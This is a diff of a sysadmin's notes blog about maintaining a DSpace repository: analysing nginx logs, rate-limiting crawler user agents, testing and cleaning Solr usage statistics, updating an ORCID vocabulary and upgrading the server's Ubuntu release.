So 4.6 million from XMLUI and another 1.2 million from API requests
Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -152,22 +152,22 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</ul>
</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
</code></pre><ul>
<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
</code></pre><ul>
<li>The types of requests in the access logs are (by lazily extracting the sixth field in the nginx log)</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | awk '{print $6}' | sed 's/&quot;//' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | awk &#39;{print $6}&#39; | sed &#39;s/&#34;//&#39; | sort | uniq -c | sort -n
1 PUT
8 PROPFIND
283 OPTIONS
@ -177,7 +177,7 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</code></pre><ul>
<li>Two very active IPs are 34.224.4.16 and 34.234.204.152, which made over 360,000 requests in October:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#39;(34\.224\.4\.16|34\.234\.204\.152)&#39;
365288
</code></pre><ul>
<li>Their user agent is one I&rsquo;ve never seen before:</li>
@ -186,22 +186,22 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</code></pre><ul>
<li>Most of them seem to be to community or collection discover and browse results pages like <code>/handle/10568/103/discover</code>:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -o -E &quot;GET /(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -o -E &#34;GET /(bitstream|discover|handle)&#34; | sort | uniq -c
6566 GET /bitstream
351928 GET /handle
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -E &quot;GET /(bitstream|discover|handle)&quot; | grep -c discover
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c discover
214209
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -E &quot;GET /(bitstream|discover|handle)&quot; | grep -c browse
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c browse
86874
</code></pre><ul>
<li>As far as I can tell, none of their requests are counted in the Solr statistics:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true&#39;
</code></pre><ul>
<li>Still, those requests are CPU intensive so I will add their user agent to the &ldquo;badbots&rdquo; rate limiting in nginx to reduce the impact on server load</li>
<li>After deploying it I checked by setting my user agent to Amazonbot and making a few requests (which were denied with HTTP 503):</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:&quot;Amazonbot/0.1&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1/discover&#39; User-Agent:&#34;Amazonbot/0.1&#34;
</code></pre><ul>
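<li>For reference, one way to implement that kind of per-agent rate limiting in nginx is a <code>map</code> on the user agent feeding a <code>limit_req_zone</code>; this is only a rough sketch (zone name, size, and rate are assumptions, not our exact config):</li>
</ul>
<pre tabindex="0"><code>map $http_user_agent $ua_badbot {
    default        &#34;&#34;;
    ~*Amazonbot    $http_user_agent;
}
# requests with an empty key are not rate limited
limit_req_zone $ua_badbot zone=badbots:10m rate=1r/s;
# then, inside the relevant server or location block:
limit_req zone=badbots;
</code></pre><ul>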
<li>On the topic of spiders, I have been wanting to update DSpace&rsquo;s default list of spiders in <code>config/spiders/agents</code>, perhaps by dropping a new list in from <a href="https://github.com/atmire/COUNTER-Robots">Atmire&rsquo;s COUNTER-Robots</a> project
<ul>
@ -210,23 +210,23 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;iskanie&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;iskanie&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y' User-Agent:&quot;iskanie&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;iskanie&#34;
</code></pre><ul>
<li>A bit later I checked Solr and found three requests from my IP with that user agent this month:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0'
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0&#39;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;1&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&quot;fq&quot;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;3&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;1&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&#34;fq&#34;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;3&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>Now I want to make similar requests with a user agent that is included in DSpace&rsquo;s current user agent list:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;celestial&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;celestial&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y' User-Agent:&quot;celestial&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;celestial&#34;
</code></pre><ul>
<li>After twenty minutes I didn&rsquo;t see any requests in Solr, so I assume they did not get logged because they matched a bot list&hellip;
<ul>
@ -247,7 +247,7 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
</ul>
</li>
</ul>
<pre tabindex="0"><code>else if (line.hasOption('m'))
<pre tabindex="0"><code>else if (line.hasOption(&#39;m&#39;))
{
SolrLogger.markRobotsByIP();
}
@ -263,16 +263,16 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
<ul>
<li>I added &ldquo;alanfuuu2&rdquo; to the example spiders file, restarted Tomcat, then made two requests to DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;alanfuuu1&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;alanfuuu2&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu1&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu2&#34;
</code></pre><ul>
<li>After committing the changes in Solr I saw one request for &ldquo;alanfuuu1&rdquo; and no requests for &ldquo;alanfuuu2&rdquo;:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
</code></pre><ul>
<li>So basically it seems like a win to update the example file with the latest one from Atmire&rsquo;s COUNTER-Robots list
<ul>
@ -281,16 +281,16 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanf
</li>
<li>I&rsquo;m curious how special character matching works in Solr, so I will test two requests: one with &ldquo;<a href="http://www.gnip.com">www.gnip.com</a>&rdquo; which is in the spider list, and one with &ldquo;<a href="http://www.gnyp.com">www.gnyp.com</a>&rdquo; which isn&rsquo;t:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;www.gnip.com&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;www.gnyp.com&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnip.com&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnyp.com&#34;
</code></pre><ul>
<li>Then commit changes to Solr so we don&rsquo;t have to wait:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>So the filtering seems to be working, because &ldquo;www.gnip.com&rdquo; is one of the new patterns added to the spiders file&hellip;</li>
</ul>
@ -314,24 +314,24 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.g
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;62944&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;62944&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Similar for com.plumanalytics, Grammarly, and ltx71!</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
*com.plumanalytics*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;28256&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;6288&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;105663&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
*com.plumanalytics*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;28256&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;6288&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;105663&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Deleting these seems to work, for example the 105,000 ltx71 records from 2018:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true'
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
</code></pre><ul>
<li>I wrote a quick bash script to check all these user agents against the CGSpace Solr statistics cores
<ul>
@ -341,21 +341,21 @@ $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&a
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
12&amp;q=userAgent:*Unpaywall*' | xmllint --format - | less
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
12&amp;q=userAgent:*Unpaywall*&#39; | xmllint --format - | less
...
&lt;lst name=&quot;facet_counts&quot;&gt;
&lt;lst name=&quot;facet_queries&quot;/&gt;
&lt;lst name=&quot;facet_fields&quot;&gt;
&lt;lst name=&quot;dateYearMonth&quot;&gt;
&lt;int name=&quot;2019-10&quot;&gt;198624&lt;/int&gt;
&lt;int name=&quot;2019-05&quot;&gt;88422&lt;/int&gt;
&lt;int name=&quot;2019-06&quot;&gt;79911&lt;/int&gt;
&lt;int name=&quot;2019-09&quot;&gt;67065&lt;/int&gt;
&lt;int name=&quot;2019-07&quot;&gt;39026&lt;/int&gt;
&lt;int name=&quot;2019-08&quot;&gt;36889&lt;/int&gt;
&lt;int name=&quot;2019-04&quot;&gt;36512&lt;/int&gt;
&lt;int name=&quot;2019-11&quot;&gt;760&lt;/int&gt;
&lt;lst name=&#34;facet_counts&#34;&gt;
&lt;lst name=&#34;facet_queries&#34;/&gt;
&lt;lst name=&#34;facet_fields&#34;&gt;
&lt;lst name=&#34;dateYearMonth&#34;&gt;
&lt;int name=&#34;2019-10&#34;&gt;198624&lt;/int&gt;
&lt;int name=&#34;2019-05&#34;&gt;88422&lt;/int&gt;
&lt;int name=&#34;2019-06&#34;&gt;79911&lt;/int&gt;
&lt;int name=&#34;2019-09&#34;&gt;67065&lt;/int&gt;
&lt;int name=&#34;2019-07&#34;&gt;39026&lt;/int&gt;
&lt;int name=&#34;2019-08&#34;&gt;36889&lt;/int&gt;
&lt;int name=&#34;2019-04&#34;&gt;36512&lt;/int&gt;
&lt;int name=&#34;2019-11&#34;&gt;760&lt;/int&gt;
&lt;/lst&gt;
&lt;/lst&gt;
</code></pre><ul>
@ -423,17 +423,17 @@ istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do
</li>
<li>Testing modifying some of the COUNTER-Robots patterns to use <code>[0-9]</code> instead of <code>\d</code> digit character type, as Solr&rsquo;s regex search can&rsquo;t use those</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;Scrapoo/1&quot;
$ http &quot;http://localhost:8081/solr/statistics/update?commit=true&quot;
$ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&quot; | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
$ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&quot; | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;Scrapoo/1&#34;
$ http &#34;http://localhost:8081/solr/statistics/update?commit=true&#34;
$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&#34; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&#34; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Nice, so searching with regex in Solr with <code>//</code> syntax works for those digits!</li>
<li>I realized that it&rsquo;s easier to search Solr from curl via POST using this syntax:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=userAgent:*Scrapoo*&amp;rows=0&quot;)
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:*Scrapoo*&amp;rows=0&#34;)
</code></pre><ul>
<li>If the parameters include something like &ldquo;[0-9]&rdquo; then curl interprets it as a URL glob range and will make ten requests (see the globbing note after the next code block)
<ul>
@ -441,7 +441,7 @@ $ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2'
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select&#39; -d &#39;q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2&#39;
</code></pre><ul>
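<li>Alternatively, curl&rsquo;s <code>-g</code>/<code>--globoff</code> option disables URL globbing, so a bracket expression should survive in the URL itself, something like:</li>
</ul>
<pre tabindex="0"><code>$ curl -g -s &#34;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&amp;rows=0&#34;
</code></pre><ul>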
<li>I updated the <code>check-spider-hits.sh</code> script to use the POST syntax (sketched below), and I&rsquo;m evaluating the feasibility of including the regex search patterns from the spider agent file, as I had been filtering them out due to differences in PCRE and Solr regex syntax and issues with shell handling</li>
</ul>
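<ul>
<li>A minimal sketch of that per-agent POST query loop (the agents file path is an example, and this is not the actual script):</li>
</ul>
<pre tabindex="0"><code>$ while read -r agent; do
    # note: agents with spaces or regex metacharacters would need escaping/URL encoding
    hits=$(curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:${agent}&amp;rows=0&#34; | xmllint --xpath &#39;string(//result/@numFound)&#39; -)
    echo &#34;${agent}: ${hits}&#34;
done &lt; dspace/config/spiders/agents/example
</code></pre><ul>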
@ -450,7 +450,7 @@ $ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2019-11-14-combined-orcids.txt -o /tmp/2019-11-14-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
View File
@ -46,7 +46,7 @@ Make sure all packages are up to date and the package manager is up to date, the
# dpkg -C
# reboot
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -153,7 +153,7 @@ Make sure all packages are up to date and the package manager is up to date, the
# tar czf 2019-12-01-linode18-etc.tar.gz /etc
</code></pre><ul>
<li>Then check all third-party repositories in /etc/apt to see if everything using &ldquo;xenial&rdquo; has packages available for &ldquo;bionic&rdquo; and then update the sources:</li>
<li><!-- raw HTML omitted --># sed -i &rsquo;s/xenial/bionic/' /etc/apt/sources.list.d/*.list<!-- raw HTML omitted --></li>
<li><code># sed -i &#39;s/xenial/bionic/&#39; /etc/apt/sources.list.d/*.list</code></li>
<li>Pause the Uptime Robot monitoring for CGSpace</li>
<li>Make sure the update manager is installed and do the upgrade:</li>
</ul>
@ -163,7 +163,7 @@ Make sure all packages are up to date and the package manager is up to date, the
<li>After the upgrade finishes, remove Java 11, force the installation of bionic nginx, and reboot the server:</li>
</ul>
<pre tabindex="0"><code># apt purge openjdk-11-jre-headless
# apt install 'nginx=1.16.1-1~bionic'
# apt install &#39;nginx=1.16.1-1~bionic&#39;
# reboot
</code></pre><ul>
<li>After the server comes back up, remove Python virtualenvs that were created with Python 3.5 and re-run certbot to make sure it&rsquo;s working:</li>
@ -195,8 +195,8 @@ Make sure all packages are up to date and the package manager is up to date, the
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030' &gt; /tmp/cgspace-104030.xml
$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030' &gt; /tmp/dspacetest-104030.xml
<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/cgspace-104030.xml
$ http &#39;https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/dspacetest-104030.xml
</code></pre><ul>
<li>The DSpace Test ones actually now capture the DOI, whereas the CGSpace ones don&rsquo;t&hellip;</li>
<li>And the DSpace Test one doesn&rsquo;t include review status as <code>dc.description</code>, but I don&rsquo;t think that&rsquo;s an important field</li>
@ -209,11 +209,11 @@ $ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPref
</ul>
</li>
</ul>
